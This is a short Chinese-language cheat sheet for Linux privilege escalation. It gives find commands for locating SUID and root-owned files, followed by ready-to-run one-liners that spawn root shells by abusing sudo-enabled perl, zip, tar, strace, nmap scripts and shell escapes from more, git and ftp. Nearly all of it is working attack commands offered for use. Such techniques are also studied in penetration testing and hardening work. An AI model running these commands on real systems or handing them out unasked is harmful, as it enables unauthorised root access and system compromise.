用以下命令查找
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print2>/dev/null

下面的是利用方式,这里不全,每个含有suid权限的文件都可以尝试利用
sudo su - root

sudo perl -e "exec '/bin/bash'"

touch test
sudo zip /tmp/1.zip /tmp/test -T --unzip-command="sh -c /bin/bash"

touch test
sudo tar cf /dev/null test --checkpoint=1 --checkpoint-action=exec=/bin/bash

sudo strace -o/dev/null /bin/bash

echo "os.execute('/bin/sh')">/tmp/shell.nse
sudo nmap --script=/tmp/shell.nse

sudo more /etc/rsyslog.conf
!/bin/bash

sudo git help status
!/bin/bash

sudo ftp
!/bin/bash